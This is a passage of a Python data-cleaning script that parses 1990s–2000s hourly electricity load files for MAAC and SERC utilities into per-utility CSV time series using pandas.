s = pd.DataFrame(pd.concat([pd.Series(main[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(main[k][i]))) for i in main[k].keys()]).sort_index(), columns=['load'])
s['load'] = s['load'].astype(float).replace(0, np.nan)
s.to_csv('./main/%s.csv' % k)
# EEI
# Bizarre formatting until 1998
###### MAAC
# AE: 963
# BC: 1167
# DPL: 5027
# PU: 7088
# PN: 14715
# PE: 14940
# PEP: 15270
# PS: 15477
# PJM: 14725
# ALL UTILS
maac93 = pd.read_fwf('%s/maac/1993/PJM93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1)
maac94 = pd.read_fwf('%s/maac/1994/PJM94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1)
maac95 = pd.read_csv('%s/maac/1995/PJM95' % (fulldir), sep='\t', header=None, skipfooter=1)
maac96 = pd.read_csv('%s/maac/1996/PJM96' % (fulldir), sep='\t', header=None, skipfooter=1)
maac = {
963 : {
1993 : maac93[maac93[0].str.contains('AE')].iloc[:, 1:].values.ravel(),
1994 : maac94[maac94[0].str.contains('AE')].iloc[:, 1:].values.ravel(),
1995 : maac95[maac95[1].str.contains('AE')].iloc[:, 2:].values.ravel(),
1996 : maac96[maac96[1].str.contains('AE')].iloc[:, 2:].values.ravel(),
1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='ACE_LOAD').iloc[:, 1:25].values.ravel()
},
1167 : {
1993 : maac93[maac93[0].str.contains('BC')].iloc[:, 1:].values.ravel(),
1994 : maac94[maac94[0].str.contains('BC')].iloc[:, 1:].values.ravel(),
1995 : maac95[maac95[1].str.contains('BC')].iloc[:, 2:].values.ravel(),
1996 : maac96[maac96[1].str.contains('BC')].iloc[:, 2:].values.ravel(),
1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='BC_LOAD').iloc[:, 1:25].values.ravel()
},
5027 : {
1993 : maac93[maac93[0].str.contains('DP')].iloc[:, 1:].values.ravel(),
1994 : maac94[maac94[0].str.contains('DP')].iloc[:, 1:].values.ravel(),
1995 : maac95[maac95[1].str.contains('DP')].iloc[:, 2:].values.ravel(),
1996 : maac96[maac96[1].str.contains('DP')].iloc[:, 2:].values.ravel(),
1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='DPL_LOAD').iloc[:366, 1:25].values.ravel()
},
7088 : {
1993 : maac93[maac93[0].str.contains('PU')].iloc[:, 1:].values.ravel(),
1994 : maac94[maac94[0].str.contains('PU')].iloc[:, 1:].values.ravel(),
1995 : maac95[maac95[1].str.contains('PU')].iloc[:, 2:].values.ravel(),
1996 : maac96[maac96[1].str.contains('PU')].iloc[:, 2:].values.ravel(),
1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='GPU_LOAD').iloc[:366, 1:25].values.ravel()
},
14715 : {
1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='PN_LOAD').iloc[:366, 1:25].values.ravel()
},
14940 : {
1993 : maac93[maac93[0].str.contains('PE$')].iloc[:, 1:].values.ravel(),
1994 : maac94[maac94[0].str.contains('PE$')].iloc[:, 1:].values.ravel(),
1995 : maac95[maac95[1].str.contains('PE$')].iloc[:, 2:].values.ravel(),
1996 : maac96[maac96[1].str.contains('PE$')].iloc[:, 2:].values.ravel(),
1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='PE_Load').iloc[:366, 1:25].values.ravel()
},
15270 : {
1993 : maac93[maac93[0].str.contains('PEP')].iloc[:, 1:].values.ravel(),
1994 : maac94[maac94[0].str.contains('PEP')].iloc[:, 1:].values.ravel(),
1995 : maac95[maac95[1].str.contains('PEP')].iloc[:, 2:].values.ravel(),
1996 : maac96[maac96[1].str.contains('PEP')].iloc[:, 2:].values.ravel(),
1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='PEP_LOAD').iloc[:366, 1:25].values.ravel()
},
15477 : {
1993 : maac93[maac93[0].str.contains('PS')].iloc[:, 1:].values.ravel(),
1994 : maac94[maac94[0].str.contains('PS')].iloc[:, 1:].values.ravel(),
1995 : maac95[maac95[1].str.contains('PS')].iloc[:, 2:].values.ravel(),
1996 : maac96[maac96[1].str.contains('PS')].iloc[:, 2:].values.ravel(),
1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='PS_Load').iloc[:366, 1:25].values.ravel()
},
14725 : {
1993 : maac93[maac93[0].str.contains('PJM')].iloc[:, 1:].values.ravel(),
1994 : maac94[maac94[0].str.contains('PJM')].iloc[:, 1:].values.ravel(),
1995 : maac95[maac95[1].str.contains('PJM')].iloc[:, 2:].values.ravel(),
1996 : maac96[maac96[1].str.contains('PJM')].iloc[:, 2:].values.ravel(),
1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='PJM_LOAD').iloc[:366, 1:25].values.ravel(),
1998 : pd.read_csv('%s/maac/1998/PJM98' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, 2:].values.ravel(),
1999 : pd.read_excel('%s/maac/1999/PJM99' % (fulldir), header=None)[2].values,
2000 : pd.read_excel('%s/maac/2000/PJM00' % (fulldir), header=None)[2].values
}
}
if not os.path.exists('./maac'):
os.mkdir('maac')
for k in maac.keys():
print k
s = pd.DataFrame(pd.concat([pd.Series(maac[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(maac[k][i]))) for i in maac[k].keys()]).sort_index(), columns=['load'])
s['load'] = s['load'].astype(float).replace(0, np.nan)
s.to_csv('./maac/%s.csv' % k)
###### SERC
# AEC: 189
# CPL: 3046
# CEPC: 40218
# CEPB: 3408
# MEMP: 12293
# DUKE: 5416
# FPWC: 6235 *
# FLINT: 6411
# GUC: 7639
# LCEC: 10857
# NPL: 13204
# OPC: 13994
# SCEG: 17539
# SCPS: 17543
# SMEA: 17568
# TVA: 18642
# VIEP: 19876
# WEMC: 20065
# DU: 4958
# AECI: 924
# ODEC-D: 402290
# ODEC-V: 402291
# ODEC: 40229
# SOCO-APCO: 195
# SOCO-GPCO: 7140
# SOCO-GUCO: 7801
# SOCO-MPCO: 12686
# SOCO-SECO: 16687 *?
serc = {
189 : {
1993 : pd.read_csv('%s/serc/1993/AEC93' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, 1:].values.ravel(),
1994 : pd.read_csv('%s/serc/1994/AEC94' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=6).iloc[:, 1:].values.ravel(),
1995 : pd.read_csv('%s/serc/1995/AEC95' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=1).iloc[:, 1:].values.ravel(),
1996 : pd.read_csv('%s/serc/1996/AEC96' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=6).iloc[:, 1:].values.ravel(),
1997 : pd.read_csv('%s/serc/1997/AEC97' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=6).iloc[:, 1:].values.ravel(),
1998 : pd.read_csv('%s/serc/1998/AEC98' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=5).iloc[:, 1:].values.ravel(),
1999 : pd.read_csv('%s/serc/1999/AEC99' % (fulldir), sep='\t', skipinitialspace=True, header=None, skiprows=3).iloc[:, 1:].values.ravel(),
2000 : pd.read_csv('%s/serc/2000/AEC00' % (fulldir), sep='\t', skipinitialspace=True, header=None, skiprows=5).iloc[:, 1:].values.ravel(),
2001 : pd.read_csv('%s/serc/2001/AEC01' % (fulldir), sep='\t', skipinitialspace=True, header=None, skiprows=5).iloc[:, 1:].values.ravel(),
2002 : pd.read_csv('%s/serc/2002/AEC02' % (fulldir), sep='\t', skipinitialspace=True, header=None, skiprows=4).iloc[:, 1:].values.ravel(),
2004 : pd.read_csv('%s/serc/2004/AEC04' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=4).iloc[:, 1:].values.ravel()
},
3046 : {
1994 : pd.read_csv('%s/serc/1994/CPL94' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, -1].values,
1995 : pd.read_csv('%s/serc/1995/CPL95' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=5)[1].values,
1996 : pd.DataFrame([i.split() for i in open('%s/serc/1996/CEPL96' % (fulldir)).readlines()[1:]])[2].astype(float).values,
1997 : pd.DataFrame([i.split() for i in open('%s/serc/1997/CPL97' % (fulldir)).readlines()[1:]])[2].astype(float).values,
1998 : pd.DataFrame([i.split() for i in open('%s/serc/1998/CPL98' % (fulldir)).readlines()[1:]])[2].astype(float).values,
1999 : pd.DataFrame([i.split() for i in open('%s/serc/1999/CPL99' % (fulldir)).readlines()[1:]])[2].astype(float).values,
2000 : pd.read_excel('%s/serc/2000/CPL00' % (fulldir))['Load'].values,
2001 : pd.read_excel('%s/serc/2001/CPL01' % (fulldir))['Load'].values,
2002 : pd.read_excel('%s/serc/2002/CPL02' % (fulldir))['Load'].values,
2003 : pd.read_excel('%s/serc/2003/CPL03' % (fulldir))['Load'].values,
2004 : pd.read_excel('%s/serc/2004/CPL04' % (fulldir))['Load'].values
},
40218 : {
1993 : pd.read_fwf('%s/serc/1993/CEPC93' % (fulldir), header=None).iloc[:, 1:-1].values.ravel(),
1994 : pd.read_csv('%s/serc/1994/CEPC94' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=1).iloc[:, 1:-1].replace('.', '0').astype(float).values.ravel(),
1995 : pd.read_csv('%s/serc/1995/CEPC95' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, 1:-1].replace('.', '0').astype(float).values.ravel(),
1996 : (pd.read_fwf('%s/serc/1996/CEPC96' % (fulldir)).iloc[:-1, 1:]/1000).values.ravel(),
1997 : (pd.DataFrame([i.split() for i in open('%s/serc/1997/CEPC97' % (fulldir)).readlines()[5:]]).iloc[:-1, 1:].astype(float)/1000).values.ravel(),
1998 : (pd.DataFrame([i.split() for i in open('%s/serc/1998/CEPC98' % (fulldir)).readlines()]).iloc[:, 1:].astype(float)).values.ravel(),
2000 : pd.read_excel('%s/serc/2000/CEPC00' % (fulldir), sheetname=1, skiprows=3)['MW'].values,
2001 : pd.read_excel('%s/serc/2001/CEPC01' % (fulldir), sheetname=1, skiprows=3)['MW'].values,
2002 : pd.read_excel('%s/serc/2002/CEPC02' % (fulldir), sheetname=0, skiprows=5)['MW'].values,
2002 : pd.read_excel('%s/serc/2002/CEPC02' % (fulldir), sheetname=0, skiprows=5)['MW'].values
},
3408 : {
1993 : (pd.DataFrame([i.split() for i in open('%s/serc/1993/CEPB93' % (fulldir)).readlines()[12:]])[1].astype(float)/1000).values,
1994 : (pd.DataFrame([i.split() for i in open('%s/serc/1994/CEPB94' % (fulldir)).readlines()[10:]])[1].astype(float)).values,
1995 : (pd.DataFrame([i.split() for i in open('%s/serc/1995/CEPB95' % (fulldir)).readlines()[6:]])[2].astype(float)).values,
1996 : (pd.DataFrame([i.split() for i in open('%s/serc/1996/CEPB96' % (fulldir)).readlines()[10:]])[2].astype(float)).values,
1997 : (pd.DataFrame([i.split() for i in open('%s/serc/1997/CEPB97' % (fulldir)).readlines()[9:]])[2].astype(float)).values,
1998 : (pd.DataFrame([i.split() for i in open('%s/serc/1998/CEPB98' % (fulldir)).readlines()[9:]])[2].astype(float)).values,
1999 : (pd.DataFrame([i.split() for i in open('%s/serc/1999/CEPB99' % (fulldir)).readlines()[8:]])[2].astype(float)).values,
2000 : (pd.DataFrame([i.split() for i in open('%s/serc/2000/CEPB00' % (fulldir)).readlines()[11:]])[2].astype(float)).values,
2001 : (pd.DataFrame([i.split() for i in open('%s/serc/2001/CEPB01' % (fulldir)).readlines()[8:]])[2].astype(float)).values,
2002 : (pd.DataFrame([i.split() for i in open('%s/serc/2002/CEPB02' % (fulldir)).readlines()[6:]])[4].astype(float)).values,
2003 : (pd.DataFrame([i.split() for i in open('%s/serc/2003/CEPB03' % (fulldir)).readlines()[6:]])[2].astype(float)).values
},
12293 : {
2000 : (pd.read_csv('%s/serc/2000/MEMP00' % (fulldir)).iloc[:, -1]/1000).values,
2001 : (pd.DataFrame([i.split() for i in open('%s/serc/2001/MEMP01' % (fulldir)).readlines()[1:]])[3].str.replace(',', '').astype(float)/1000).values,
2002 : (pd.read_csv('%s/serc/2002/MEMP02' % (fulldir), sep='\t').iloc[:, -1].str.replace(',', '').astype(float)/1000).values,
2003 : pd.read_csv('%s/serc/2003/MEMP03' % (fulldir)).iloc[:, -1].str.replace(',', '').astype(float).values
},
5416 : {
1999 : pd.DataFrame([i.split() for i in open('%s/serc/1999/DUKE99' % (fulldir)).readlines()[4:]])[2].astype(float).values,
2000 : pd.DataFrame([i.split() for i in open('%s/serc/2000/DUKE00' % (fulldir)).readlines()[5:]])[2].astype(float).values,
2001 : pd.DataFrame([i.split() for i in open('%s/serc/2001/DUKE01' % (fulldir)).readlines()[5:]])[2].astype(float).values,
2002 : pd.DataFrame([i.split() for i in open('%s/serc/2002/DUKE02' % (fulldir)).readlines()[5:]])[2].astype(float).values,
2003 : pd.DataFrame([i.split() for i in open('%s/serc/2003/DUKE03' % (fulldir)).readlines()[5:-8]])[2].astype(float).values,
2004 : pd.DataFrame([i.split() for i in open('%s/serc/2004/DUKE04' % (fulldir)).readlines()[5:]])[2].astype(float).values
},
6411 : {
1993 : (pd.DataFrame([i.split() for i in open('%s/serc/1993/FLINT93' % (fulldir)).readlines()])[6].astype(float)/1000).values,
1994 : ((pd.DataFrame([i.split() for i in open('%s/serc/1994/FLINT94' % (fulldir)).readlines()[:-1]])).iloc[:, -1].astype(float)/1000).values,
1995 : ((pd.DataFrame([i.split() for i in open('%s/serc/1995/FLINT95' % (fulldir)).readlines()[1:]]))[3].astype(float)/1000).values,
1996 : (pd.DataFrame([i.split() for i in open('%s/serc/1996/FLINT96' % (fulldir)).readlines()[3:-2]]))[2].astype(float).values,
1997 : (pd.DataFrame([i.split() for i in open('%s/serc/1997/FLINT97' % (fulldir)).readlines()[6:]]))[3].astype(float).values,
1998 : (pd.DataFrame([i.split() for i in open('%s/serc/1998/FLINT98' % (fulldir)).readlines()[4:]]))[2].astype(float).values,
1999 : (pd.DataFrame([i.split() for i in open('%s/serc/1999/FLINT99' % (fulldir)).readlines()[1:]]))[1].astype(float).values,
2000 : (pd.DataFrame([i.split() for i in open('%s/serc/2000/FLINT00' % (fulldir)).readlines()[2:]]))[4].astype(float).values
},
7639 : {
1993 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1993', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1993', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
1994 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1994', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1994', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
1995 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1995', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1995', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
1996 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1996', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1996', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
1997 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1997', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1997', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
1998 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1998', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1998', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
1999 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1999', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1999', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
2000 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='2000', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='2000', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
},
10857 : {
1993 : pd.DataFrame([i.split() for i in open('%s/serc/1993/LCEC93' % (fulldir)).readlines()[:-1]]).iloc[:, 3:].astype(float).values.ravel(),
1994 : pd.DataFrame([i.split() for i in open('%s/serc/1994/LCEC94' % (fulldir)).readlines()[:-1]]).iloc[:, 3:].astype(float).values.ravel()
},
13204 : {
1993 : pd.DataFrame([i.split() for i in open('%s/serc/1993/NPL93' % (fulldir)).readlines()[6:]])[2].astype(float).values,
1994 : pd.read_fwf('%s/serc/1994/NPL94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel()
},
13994 : {
1993 : pd.DataFrame([i.split() for i in open('%s/serc/1993/OPC93' % (fulldir)).readlines()[4:-1]]).iloc[:, 1:].astype(float).values.ravel(),
1995 : pd.DataFrame([i.split() for i in open('%s/serc/1995/OPC95' % (fulldir)).readlines()[12:]]).iloc[:, 1:].astype(float).values.ravel(),
1996 : pd.DataFrame([i.split() for i in open('%s/serc/1996/OPC96' % (fulldir)).readlines()[12:]]).iloc[:, 1:].astype(float).values.ravel(),
1997 : pd.DataFrame([i.split() for i in open('%s/serc/1997/OPC97' % (fulldir)).readlines()[12:]]).iloc[:, 1:].astype(float).values.ravel(),
1998 : pd.DataFrame([i.split() for i in open('%s/serc/1998/OPC98' % (fulldir)).readlines()[12:]]).iloc[:, 1:].astype(float).values.ravel(),
1999 : pd.DataFrame([i.split() for i in open('%s/serc/1999/OPC99' % (fulldir)).readlines()[18:]])[2].astype(float).values,
2000 : pd.DataFrame([i.split() for i in open('%s/serc/2000/OPC00' % (fulldir)).readlines()[19:]])[2].astype(float).values
},
17539 : {
1993 : pd.DataFrame([i.split() for i in open('%s/serc/1993/SCEG93' % (fulldir)).readlines()[:-1]]).iloc[:, -1].astype(float).values,
1995 : pd.DataFrame([i.split() for i in open('%s/serc/1995/SCEG95' % (fulldir)).readlines()[:-1]]).iloc[:, -1].astype(float).values,
1996 : pd.DataFrame([i.split() for i in open('%s/serc/1996/SCEG96' % (fulldir)).readlines()[:-1]]).iloc[:, -1].astype(float).values,
1997 : pd.DataFrame([i.split() for i in open('%s/serc/1997/SCEG97' % (fulldir)).readlines()[:-1]]).iloc[:, -1].astype(float).values,
1998 : pd.DataFrame([i.split() for i in open('%s/serc/1998/SCEG98' % (fulldir)).readlines()[:]]).iloc[:, -1].astype(float).values,
1999 : pd.DataFrame([i.split() for i in open('%s/serc/1999/SCEG99' % (fulldir)).readlines()[:]]).iloc[:, -1].astype(float).values,
2000 : pd.DataFrame([i.split() for i in open('%s/serc/2000/SCEG00' % (fulldir)).readlines()[:]]).iloc[:, -1].astype(float).values,
2001 : pd.DataFrame([i.split() for i in open('%s/serc/2001/SCEG01' % (fulldir)).readlines()[:]]).iloc[:, -1].astype(float).values
},
17543 : {
1993 : pd.DataFrame([i.split() for i in open('%s/serc/1993/SCPS93' % (fulldir)).readlines()[:]]).iloc[:, 1:].astype(float).values.ravel(),
1996 : pd.DataFrame([i.split() for i in open('%s/serc/1996/SCPS96' % (fulldir)).readlines()[:-1]]).astype(float).values.ravel(),
1997 : pd.DataFrame([i.split() for i in open('%s/serc/1997/SCPS97' % (fulldir)).readlines()[1:-3]]).iloc[:, 4:-1].astype(float).values.ravel(),
1998 : pd.DataFrame([i.split() for i in open('%s/serc/1998/SCPS98' % (fulldir)).readlines()[:-1]]).iloc[:, 1:].replace('NA', '0').astype(float).values.ravel(),
1999 : pd.DataFrame([i.split() for i in open('%s/serc/1999/SCPS99' % (fulldir)).readlines()[1:-1]]).iloc[:, 2:-1].replace('NA', '0').astype(float).values.ravel(),
2000 : pd.DataFrame([i.split() for i in open('%s/serc/2000/SCPS00' % (fulldir)).readlines()[:]]).iloc[:, 2:].replace('NA', '0').astype(float).values.ravel(),
2001 : pd.DataFrame([i.split() for i in open('%s/serc/2001/SCPS01' % (fulldir)).readlines()[:]]).iloc[:, 2:].replace('NA', '0').astype(float).values.ravel(),
2002 : pd.read_excel('%s/serc/2002/SCPS02' % (fulldir), header=None).dropna(axis=1, how='all').iloc[:, 2:-1].values.ravel(),
2003 : pd.DataFrame([i.split() for i in open('%s/serc/2003/SCPS03' % (fulldir)).readlines()[:]]).iloc[:, 2:].replace('NA', '0').astype(float).values.ravel(),
2004 : pd.DataFrame([i.split() for i in open('%s/serc/2004/SCPS04' % (fulldir)).readlines()[1:]]).iloc[:, 1:-1].replace('NA', '0').astype(float).values.ravel()
},
17568 : {
1993 : (pd.DataFrame([i.split() for i in open('%s/serc/1993/SMEA93' % (fulldir)).readlines()[5:]])[2].astype(float)/1000).values.ravel(),
1994 : (pd.DataFrame([i.split() for i in open('%s/serc/1994/SMEA94' % (fulldir)).readlines()[5:]]).iloc[:, -1].astype(float)).values,
1996 : ((pd.DataFrame([i.split() for i in open('%s/serc/1996/SMEA96' % (fulldir)).readlines()[:]])).iloc[:, -24:].astype(float)/1000).values.ravel(),
1997 : pd.read_excel('%s/serc/1997/SMEA97' % (fulldir), sheetname=1, header=None, skiprows=1).iloc[:, 1:].values.ravel(),
1998 : pd.DataFrame([i.split() for i in open('%s/serc/1998/SMEA98' % (fulldir)).readlines()[1:]])[2].astype(float).values.ravel(),
1999 : pd.DataFrame([i.split() for i in open('%s/serc/1999/SMEA99' % (fulldir)).readlines()[1:]])[2].astype(float).values.ravel(),
2000 : pd.DataFrame([i.split() for i in open('%s/serc/2000/SMEA00' % (fulldir)).readlines()[1:]])[2].astype(float).values.ravel(),
2002 : pd.DataFrame([i.split() for i in open('%s/serc/2002/SMEA02' % (fulldir)).readlines()[2:]])[2].astype(float).values.ravel(),
2003 : pd.DataFrame([i.split() for i in open('%s/serc/2003/SMEA03' % (fulldir)).readlines()[1:]])[2].astype(float).values.ravel()
},
18642 : {
1993 : (pd.DataFrame([i.split() for i in open('%s/serc/1993/TVA93' % (fulldir)).readlines()[:-1]])[2].astype(float)).values.ravel(),
1994 : (pd.DataFrame([i.split() for i in open('%s/serc/1994/TVA94' % (fulldir)).readlines()[:-1]])[2].astype(float)).values.ravel(),
1995 : (pd.DataFrame([i.split() for i in open('%s/serc/1995/TVA95' % (fulldir)).readlines()[:-1]])[2].astype(float)).values.ravel(),
1996 : (pd.DataFrame([i.split() for i in open('%s/serc/1996/TVA96' % (fulldir)).readlines()[:-1]])[2].astype(float)).values.ravel(),
1997 : (pd.DataFrame([i.split() for i in open('%s/serc/1997/TVA97' % (fulldir)).readlines()[:-1]])[2].astype(float)).values.ravel(),
1998 : (pd.DataFrame([i.split() for i in open('%s/serc/1998/TVA98' % (fulldir)).readlines()[:-1]])[2].astype(float)).values.ravel(),
1999 : pd.read_excel('%s/serc/1999/TVA99' % (fulldir)).iloc[:, 2].astype(float).values,
2000 : pd.read_excel('%s/serc/2000/TVA00' % (fulldir)).iloc[:, 2].astype(float).values,
2001 : pd.read_excel('%s/serc/2001/TVA01' % (fulldir), header=None, skiprows=3).iloc[:, 2].astype(float).values,
2003 : pd.read_excel('%s/serc/2003/TVA03' % (fulldir)).iloc[:, -1].values
},
19876 : {
1993 : pd.read_fwf('%s/serc/1993/VIEP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/serc/1994/VIEP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/serc/1995/VIEP95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/serc/1996/VIEP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/serc/1997/VIEP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1998 : pd.read_fwf('%s/serc/1998/VIEP98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1999 : pd.read_fwf('%s/serc/1999/VIEP99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
2000 : (pd.DataFrame([i.split() for i in open('%s/serc/2000/VIEP00' % (fulldir)).readlines()[1:]])[2].astype(float)).values.ravel(),
2001 : (pd.DataFrame([i.split() for i in open('%s/serc/2001/VIEP01' % (fulldir)).readlines()[1:]])[2].astype(float)).values.ravel(),
2002 : (pd.DataFrame([i.split() for i in open('%s/serc/2002/VIEP02' % (fulldir)).readlines()[1:]])[2].astype(float)).values.ravel(),
2003 : (pd.DataFrame([i.split() for i in open('%s/serc/2003/VIEP03' % (fulldir)).readlines()[2:]])[3].astype(float)).values.ravel(),
2004 : (pd.DataFrame([i.split() for i in open('%s/serc/2004/VIEP04' % (fulldir)).readlines()[:]])[3].astype(float)).values.ravel()
},
20065 : {
1993 : pd.read_fwf('%s/serc/1993/WEMC93' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
1995 : (pd.read_csv('%s/serc/1995/WEMC95' % (fulldir), skiprows=1, header=None, sep=' ', skipinitialspace=True)[3]/1000).values,
1996 : (pd.read_excel('%s/serc/1996/WEMC96' % (fulldir))['Load']/1000).values,
1997 : pd.read_excel('%s/serc/1997/WEMC97' % (fulldir), skiprows=4)['MW'].values,
1998 : pd.concat([pd.read_excel('%s/serc/1998/WEMC98' % (fulldir), sheetname=i).iloc[:, -1] for i in range(12)]).values,
1999 : pd.read_excel('%s/serc/1999/WEMC99' % (fulldir))['mwh'].values,
2000 : (pd.read_excel('%s/serc/2000/WEMC00' % (fulldir)).iloc[:, -1]/1000).values,
2001 : (pd.read_excel('%s/serc/2001/WEMC01' % (fulldir), header=None)[0]/1000).values
},
4958 : {
1999 : (pd.DataFrame([i.split() for i in open('%s/serc/1999/DU99' % (fulldir)).readlines()[1:]]).iloc[:-1, 2:].apply(lambda x: x.str.replace('[,"]', '').str.strip()).astype(float)/1000).values.ravel(),
2000 : (pd.DataFrame([i.split() for i in open('%s/serc/2000/DU00' % (fulldir)).readlines()[1:]]).iloc[:-1, 2:].apply(lambda x: x.str.replace('[,"]', '').str.strip()).astype(float)/1000).values.ravel(),
2003 : pd.read_excel('%s/serc/2003/DU03' % (fulldir)).iloc[:, -1].values
},
924 : {
1999 : pd.read_excel('%s/serc/1999/AECI99' % (fulldir))['CALoad'].values,
2001 : pd.read_excel('%s/serc/2001/AECI01' % (fulldir)).iloc[:, -1].values,
2002 : pd.Series(pd.read_excel('%s/serc/2002/AECI02' % (fulldir), skiprows=3).loc[:, 'Jan':'Dec'].values.ravel(order='F')).dropna().values
},
402290 : {
1996 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1996/ODECD96' % (fulldir)).readlines()[3:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1997 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1997/ODECD97' % (fulldir)).readlines()[4:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1998 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1998/ODECD98' % (fulldir)).readlines()[2:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1999 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1999/ODECD99' % (fulldir)).readlines()[2:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
2000 : pd.DataFrame([i.split() for i in open('%s/serc/2000/ODECD00' % (fulldir)).readlines()[3:]])[4].astype(float).values,
2001 : pd.DataFrame([i.split() for i in open('%s/serc/2001/ODECD01' % (fulldir)).readlines()[3:]])[4].str.replace('[N/A]', '').replace('', '0').astype(float).values,
2002 : pd.DataFrame([i.split() for i in open('%s/serc/2002/ODECD02' % (fulldir)).readlines()[5:]])[4].str.replace('[N/A]', '').replace('', '0').astype(float).values,
2003 : pd.DataFrame([i.split() for i in open('%s/serc/2003/ODECD03' % (fulldir)).readlines()[5:]])[4].str.replace('[N/A]', '').replace('', '0').astype(float).values,
2004 : pd.DataFrame([i.split() for i in open('%s/serc/2004/ODECD04' % (fulldir)).readlines()[5:]])[4].str.replace('[N/A]', '').replace('', '0').astype(float).values
},
402291 : {
